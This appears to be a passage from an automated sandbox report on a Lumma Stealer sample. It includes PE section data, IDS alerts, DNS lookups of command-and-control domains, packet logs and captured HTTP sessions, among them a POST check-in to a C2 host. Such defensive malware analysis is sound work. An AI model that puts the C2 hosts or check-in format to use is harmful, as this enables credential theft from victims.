                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add dword ptr [eax+00000000h], eax
                                                                add byte ptr [eax], al
                                                                adc byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                or ecx, dword ptr [edx]
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                pushad
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [ecx], al
                                                                add byte ptr [eax], 00000000h
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                adc byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add al, 0Ah
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                xor byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                pop ds
                                                                add byte ptr [eax+000000FEh], ah
                                                                add byte ptr [edx], ah
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [esi], al
                                                                add byte ptr [eax], 00000000h
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al

                                                                Data Directories

                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x5f0570x6b.idata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x5f1f80x8.idata
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                Sections

                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                0x10000x5d0000x25e0097cc3cc9ca8f28e98ab1518b6dcbe2a9False0.9995681208745875data7.978134199396537IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .rsrc 0x5e0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .idata 0x5f0000x10000x200fe72def8b74193a84232a780098a7ce0False0.150390625data1.04205214219471IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                0x600000x2a60000x2004ab9aa01c460fd94b03b22970d48dfbeunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                achgldqf0x3060000x1990000x198c0053033d796b998aea1add3228fc969296False0.9941400277140673data7.953550554891692IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                oujhmehu0x49f0000x10000x400096b356909754fbc4193dbf66c3bfdaaFalse0.76953125data6.08201160630928IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .taggant0x4a00000x30000x2200ea93898528b1a4c0b00d866554f14b9dFalse0.07950367647058823DOS executable (COM)1.001241834918481IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                Imports

                                                                DLLImport
                                                                kernel32.dlllstrcpy

                                                                Network Behavior

                                                                Suricata IDS Alerts

                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                2024-10-13T17:46:12.993655+02002056471ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site)1192.168.2.7593401.1.1.153UDP
                                                                2024-10-13T17:46:13.143968+02002056485ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store)1192.168.2.7616111.1.1.153UDP
                                                                2024-10-13T17:46:13.157597+02002056483ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store)1192.168.2.7557041.1.1.153UDP
                                                                2024-10-13T17:46:13.171047+02002056481ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store)1192.168.2.7647811.1.1.153UDP
                                                                2024-10-13T17:46:13.182860+02002056479ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store)1192.168.2.7515381.1.1.153UDP
                                                                2024-10-13T17:46:13.202147+02002056477ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store)1192.168.2.7538601.1.1.153UDP
                                                                2024-10-13T17:46:13.214638+02002056475ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store)1192.168.2.7609321.1.1.153UDP
                                                                2024-10-13T17:46:13.225766+02002056473ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site)1192.168.2.7570191.1.1.153UDP
                                                                2024-10-13T17:46:14.500243+02002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.749709104.102.49.254443TCP
                                                                2024-10-13T17:46:15.252363+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.749714172.67.206.204443TCP
                                                                2024-10-13T17:46:15.252363+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749714172.67.206.204443TCP
                                                                2024-10-13T17:46:16.505914+02002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.749719172.67.206.204443TCP
                                                                2024-10-13T17:46:16.505914+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749719172.67.206.204443TCP

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Oct 13, 2024 17:46:13.250917912 CEST49709443192.168.2.7104.102.49.254
                                                                Oct 13, 2024 17:46:13.250938892 CEST44349709104.102.49.254192.168.2.7
                                                                Oct 13, 2024 17:46:13.251013041 CEST49709443192.168.2.7104.102.49.254
                                                                Oct 13, 2024 17:46:13.255172968 CEST49709443192.168.2.7104.102.49.254
                                                                Oct 13, 2024 17:46:13.255186081 CEST44349709104.102.49.254192.168.2.7
                                                                Oct 13, 2024 17:46:13.962594032 CEST44349709104.102.49.254192.168.2.7
                                                                Oct 13, 2024 17:46:13.962711096 CEST49709443192.168.2.7104.102.49.254
                                                                Oct 13, 2024 17:46:13.965466022 CEST49709443192.168.2.7104.102.49.254
                                                                Oct 13, 2024 17:46:13.965471029 CEST44349709104.102.49.254192.168.2.7
                                                                Oct 13, 2024 17:46:13.965766907 CEST44349709104.102.49.254192.168.2.7
                                                                Oct 13, 2024 17:46:14.017307043 CEST49709443192.168.2.7104.102.49.254
                                                                Oct 13, 2024 17:46:14.020483971 CEST49709443192.168.2.7104.102.49.254
                                                                Oct 13, 2024 17:46:14.067394018 CEST44349709104.102.49.254192.168.2.7
                                                                Oct 13, 2024 17:46:14.500222921 CEST44349709104.102.49.254192.168.2.7
                                                                Oct 13, 2024 17:46:14.500245094 CEST44349709104.102.49.254192.168.2.7
                                                                Oct 13, 2024 17:46:14.500252008 CEST44349709104.102.49.254192.168.2.7
                                                                Oct 13, 2024 17:46:14.500266075 CEST44349709104.102.49.254192.168.2.7
                                                                Oct 13, 2024 17:46:14.500272036 CEST44349709104.102.49.254192.168.2.7
                                                                Oct 13, 2024 17:46:14.500293970 CEST49709443192.168.2.7104.102.49.254
                                                                Oct 13, 2024 17:46:14.500312090 CEST44349709104.102.49.254192.168.2.7
                                                                Oct 13, 2024 17:46:14.500325918 CEST49709443192.168.2.7104.102.49.254
                                                                Oct 13, 2024 17:46:14.500360012 CEST49709443192.168.2.7104.102.49.254
                                                                Oct 13, 2024 17:46:14.630881071 CEST44349709104.102.49.254192.168.2.7
                                                                Oct 13, 2024 17:46:14.630966902 CEST44349709104.102.49.254192.168.2.7
                                                                Oct 13, 2024 17:46:14.631104946 CEST49709443192.168.2.7104.102.49.254
                                                                Oct 13, 2024 17:46:14.631125927 CEST44349709104.102.49.254192.168.2.7
                                                                Oct 13, 2024 17:46:14.631170034 CEST49709443192.168.2.7104.102.49.254
                                                                Oct 13, 2024 17:46:14.637578011 CEST44349709104.102.49.254192.168.2.7
                                                                Oct 13, 2024 17:46:14.637675047 CEST49709443192.168.2.7104.102.49.254
                                                                Oct 13, 2024 17:46:14.637686968 CEST44349709104.102.49.254192.168.2.7
                                                                Oct 13, 2024 17:46:14.637737036 CEST49709443192.168.2.7104.102.49.254
                                                                Oct 13, 2024 17:46:14.637742996 CEST44349709104.102.49.254192.168.2.7
                                                                Oct 13, 2024 17:46:14.637835026 CEST44349709104.102.49.254192.168.2.7
                                                                Oct 13, 2024 17:46:14.637892962 CEST49709443192.168.2.7104.102.49.254
                                                                Oct 13, 2024 17:46:14.638649940 CEST49709443192.168.2.7104.102.49.254
                                                                Oct 13, 2024 17:46:14.638669014 CEST44349709104.102.49.254192.168.2.7
                                                                Oct 13, 2024 17:46:14.650664091 CEST49714443192.168.2.7172.67.206.204
                                                                Oct 13, 2024 17:46:14.650706053 CEST44349714172.67.206.204192.168.2.7
                                                                Oct 13, 2024 17:46:14.650815964 CEST49714443192.168.2.7172.67.206.204
                                                                Oct 13, 2024 17:46:14.651196957 CEST49714443192.168.2.7172.67.206.204
                                                                Oct 13, 2024 17:46:14.651209116 CEST44349714172.67.206.204192.168.2.7
                                                                Oct 13, 2024 17:46:15.132539034 CEST44349714172.67.206.204192.168.2.7
                                                                Oct 13, 2024 17:46:15.132616997 CEST49714443192.168.2.7172.67.206.204
                                                                Oct 13, 2024 17:46:15.134500027 CEST49714443192.168.2.7172.67.206.204
                                                                Oct 13, 2024 17:46:15.134511948 CEST44349714172.67.206.204192.168.2.7
                                                                Oct 13, 2024 17:46:15.134802103 CEST44349714172.67.206.204192.168.2.7
                                                                Oct 13, 2024 17:46:15.136128902 CEST49714443192.168.2.7172.67.206.204
                                                                Oct 13, 2024 17:46:15.136157036 CEST49714443192.168.2.7172.67.206.204
                                                                Oct 13, 2024 17:46:15.136209965 CEST44349714172.67.206.204192.168.2.7
                                                                Oct 13, 2024 17:46:15.252424002 CEST44349714172.67.206.204192.168.2.7
                                                                Oct 13, 2024 17:46:15.252579927 CEST44349714172.67.206.204192.168.2.7
                                                                Oct 13, 2024 17:46:15.252677917 CEST44349714172.67.206.204192.168.2.7
                                                                Oct 13, 2024 17:46:15.252770901 CEST44349714172.67.206.204192.168.2.7
                                                                Oct 13, 2024 17:46:15.252778053 CEST49714443192.168.2.7172.67.206.204
                                                                Oct 13, 2024 17:46:15.252799034 CEST44349714172.67.206.204192.168.2.7
                                                                Oct 13, 2024 17:46:15.252821922 CEST49714443192.168.2.7172.67.206.204
                                                                Oct 13, 2024 17:46:15.252988100 CEST44349714172.67.206.204192.168.2.7
                                                                Oct 13, 2024 17:46:15.253043890 CEST49714443192.168.2.7172.67.206.204
                                                                Oct 13, 2024 17:46:15.255549908 CEST49714443192.168.2.7172.67.206.204
                                                                Oct 13, 2024 17:46:15.255565882 CEST44349714172.67.206.204192.168.2.7
                                                                Oct 13, 2024 17:46:15.255570889 CEST49714443192.168.2.7172.67.206.204
                                                                Oct 13, 2024 17:46:15.255575895 CEST44349714172.67.206.204192.168.2.7
                                                                Oct 13, 2024 17:46:15.580596924 CEST49719443192.168.2.7172.67.206.204
                                                                Oct 13, 2024 17:46:15.580646992 CEST44349719172.67.206.204192.168.2.7
                                                                Oct 13, 2024 17:46:15.580712080 CEST49719443192.168.2.7172.67.206.204
                                                                Oct 13, 2024 17:46:15.585617065 CEST49719443192.168.2.7172.67.206.204
                                                                Oct 13, 2024 17:46:15.585635900 CEST44349719172.67.206.204192.168.2.7
                                                                Oct 13, 2024 17:46:16.052510023 CEST44349719172.67.206.204192.168.2.7
                                                                Oct 13, 2024 17:46:16.052584887 CEST49719443192.168.2.7172.67.206.204
                                                                Oct 13, 2024 17:46:16.062814951 CEST49719443192.168.2.7172.67.206.204
                                                                Oct 13, 2024 17:46:16.062834978 CEST44349719172.67.206.204192.168.2.7
                                                                Oct 13, 2024 17:46:16.063121080 CEST44349719172.67.206.204192.168.2.7
                                                                Oct 13, 2024 17:46:16.064563990 CEST49719443192.168.2.7172.67.206.204
                                                                Oct 13, 2024 17:46:16.064600945 CEST49719443192.168.2.7172.67.206.204
                                                                Oct 13, 2024 17:46:16.064639091 CEST44349719172.67.206.204192.168.2.7
                                                                Oct 13, 2024 17:46:16.505922079 CEST44349719172.67.206.204192.168.2.7
                                                                Oct 13, 2024 17:46:16.505994081 CEST44349719172.67.206.204192.168.2.7
                                                                Oct 13, 2024 17:46:16.506186962 CEST49719443192.168.2.7172.67.206.204
                                                                Oct 13, 2024 17:46:16.506393909 CEST49719443192.168.2.7172.67.206.204
                                                                Oct 13, 2024 17:46:16.506408930 CEST44349719172.67.206.204192.168.2.7
                                                                Oct 13, 2024 17:46:16.506433010 CEST49719443192.168.2.7172.67.206.204
                                                                Oct 13, 2024 17:46:16.506438017 CEST44349719172.67.206.204192.168.2.7

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Oct 13, 2024 17:46:12.993654966 CEST5934053192.168.2.71.1.1.1
                                                                Oct 13, 2024 17:46:13.137964964 CEST53593401.1.1.1192.168.2.7
                                                                Oct 13, 2024 17:46:13.143968105 CEST6161153192.168.2.71.1.1.1
                                                                Oct 13, 2024 17:46:13.154751062 CEST53616111.1.1.1192.168.2.7
                                                                Oct 13, 2024 17:46:13.157597065 CEST5570453192.168.2.71.1.1.1
                                                                Oct 13, 2024 17:46:13.168519974 CEST53557041.1.1.1192.168.2.7
                                                                Oct 13, 2024 17:46:13.171046972 CEST6478153192.168.2.71.1.1.1
                                                                Oct 13, 2024 17:46:13.180546045 CEST53647811.1.1.1192.168.2.7
                                                                Oct 13, 2024 17:46:13.182859898 CEST5153853192.168.2.71.1.1.1
                                                                Oct 13, 2024 17:46:13.200644970 CEST53515381.1.1.1192.168.2.7
                                                                Oct 13, 2024 17:46:13.202147007 CEST5386053192.168.2.71.1.1.1
                                                                Oct 13, 2024 17:46:13.213422060 CEST53538601.1.1.1192.168.2.7
                                                                Oct 13, 2024 17:46:13.214637995 CEST6093253192.168.2.71.1.1.1
                                                                Oct 13, 2024 17:46:13.223413944 CEST53609321.1.1.1192.168.2.7
                                                                Oct 13, 2024 17:46:13.225765944 CEST5701953192.168.2.71.1.1.1
                                                                Oct 13, 2024 17:46:13.235594034 CEST53570191.1.1.1192.168.2.7
                                                                Oct 13, 2024 17:46:13.239113092 CEST4993853192.168.2.71.1.1.1
                                                                Oct 13, 2024 17:46:13.245758057 CEST53499381.1.1.1192.168.2.7
                                                                Oct 13, 2024 17:46:14.641082048 CEST6347253192.168.2.71.1.1.1
                                                                Oct 13, 2024 17:46:14.649791956 CEST53634721.1.1.1192.168.2.7

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Oct 13, 2024 17:46:12.993654966 CEST192.168.2.71.1.1.10x4e9fStandard query (0)clearancek.siteA (IP address)IN (0x0001)false
                                                                Oct 13, 2024 17:46:13.143968105 CEST192.168.2.71.1.1.10x4c7bStandard query (0)mobbipenju.storeA (IP address)IN (0x0001)false
                                                                Oct 13, 2024 17:46:13.157597065 CEST192.168.2.71.1.1.10xa62eStandard query (0)eaglepawnoy.storeA (IP address)IN (0x0001)false
                                                                Oct 13, 2024 17:46:13.171046972 CEST192.168.2.71.1.1.10xe46cStandard query (0)dissapoiznw.storeA (IP address)IN (0x0001)false
                                                                Oct 13, 2024 17:46:13.182859898 CEST192.168.2.71.1.1.10x5682Standard query (0)studennotediw.storeA (IP address)IN (0x0001)false
                                                                Oct 13, 2024 17:46:13.202147007 CEST192.168.2.71.1.1.10xda86Standard query (0)bathdoomgaz.storeA (IP address)IN (0x0001)false
                                                                Oct 13, 2024 17:46:13.214637995 CEST192.168.2.71.1.1.10x7a6eStandard query (0)spirittunek.storeA (IP address)IN (0x0001)false
                                                                Oct 13, 2024 17:46:13.225765944 CEST192.168.2.71.1.1.10x3bedStandard query (0)licendfilteo.siteA (IP address)IN (0x0001)false
                                                                Oct 13, 2024 17:46:13.239113092 CEST192.168.2.71.1.1.10xa77dStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                Oct 13, 2024 17:46:14.641082048 CEST192.168.2.71.1.1.10x4db9Standard query (0)sergei-esenin.comA (IP address)IN (0x0001)false

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Oct 13, 2024 17:46:13.137964964 CEST1.1.1.1192.168.2.70x4e9fName error (3)clearancek.sitenonenoneA (IP address)IN (0x0001)false
                                                                Oct 13, 2024 17:46:13.154751062 CEST1.1.1.1192.168.2.70x4c7bName error (3)mobbipenju.storenonenoneA (IP address)IN (0x0001)false
                                                                Oct 13, 2024 17:46:13.168519974 CEST1.1.1.1192.168.2.70xa62eName error (3)eaglepawnoy.storenonenoneA (IP address)IN (0x0001)false
                                                                Oct 13, 2024 17:46:13.180546045 CEST1.1.1.1192.168.2.70xe46cName error (3)dissapoiznw.storenonenoneA (IP address)IN (0x0001)false
                                                                Oct 13, 2024 17:46:13.200644970 CEST1.1.1.1192.168.2.70x5682Name error (3)studennotediw.storenonenoneA (IP address)IN (0x0001)false
                                                                Oct 13, 2024 17:46:13.213422060 CEST1.1.1.1192.168.2.70xda86Name error (3)bathdoomgaz.storenonenoneA (IP address)IN (0x0001)false
                                                                Oct 13, 2024 17:46:13.223413944 CEST1.1.1.1192.168.2.70x7a6eName error (3)spirittunek.storenonenoneA (IP address)IN (0x0001)false
                                                                Oct 13, 2024 17:46:13.235594034 CEST1.1.1.1192.168.2.70x3bedName error (3)licendfilteo.sitenonenoneA (IP address)IN (0x0001)false
                                                                Oct 13, 2024 17:46:13.245758057 CEST1.1.1.1192.168.2.70xa77dNo error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                Oct 13, 2024 17:46:14.649791956 CEST1.1.1.1192.168.2.70x4db9No error (0)sergei-esenin.com172.67.206.204A (IP address)IN (0x0001)false
                                                                Oct 13, 2024 17:46:14.649791956 CEST1.1.1.1192.168.2.70x4db9No error (0)sergei-esenin.com104.21.53.8A (IP address)IN (0x0001)false

                                                                HTTP Request Dependency Graph

                                                                • steamcommunity.com
                                                                • sergei-esenin.com

                                                                HTTPS Proxied Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.749709104.102.49.2544437352C:\Users\user\Desktop\file.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-13 15:46:14 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                Connection: Keep-Alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                Host: steamcommunity.com
                                                                2024-10-13 15:46:14 UTC1870INHTTP/1.1 200 OK
                                                                Server: nginx
                                                                Content-Type: text/html; charset=UTF-8
                                                                Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                Cache-Control: no-cache
                                                                Date: Sun, 13 Oct 2024 15:46:14 GMT
                                                                Content-Length: 34837
                                                                Connection: close
                                                                Set-Cookie: sessionid=c94cdce0b95ece23009d2eae; Path=/; Secure; SameSite=None
                                                                Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                2024-10-13 15:46:14 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                2024-10-13 15:46:14 UTC16384INData Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f
                                                                Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
                                                                2024-10-13 15:46:14 UTC3768INData Raw: 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29
                                                                Data Ascii: <div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
                                                                2024-10-13 15:46:14 UTC171INData Raw: 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.749714172.67.206.2044437352C:\Users\user\Desktop\file.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-13 15:46:15 UTC264OUTPOST /api HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                Content-Length: 8
                                                                Host: sergei-esenin.com
                                                                2024-10-13 15:46:15 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                Data Ascii: act=life
                                                                2024-10-13 15:46:15 UTC555INHTTP/1.1 200 OK
                                                                Date: Sun, 13 Oct 2024 15:46:15 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                X-Frame-Options: SAMEORIGIN
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7ebKHZLVH%2BBiaLdRLUe8B7gMBDIg1O7hrXX%2Biie0jYCuzegfbWWzOK5EYIcq%2BsyeiWB12dlMKObqu0Hmm2tFaoPiqGk4jwRKzo3%2F2IRPDLkzZKvaAByhqAymEoXXt3xGm3JWBg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d20761cfefc8c27-EWR
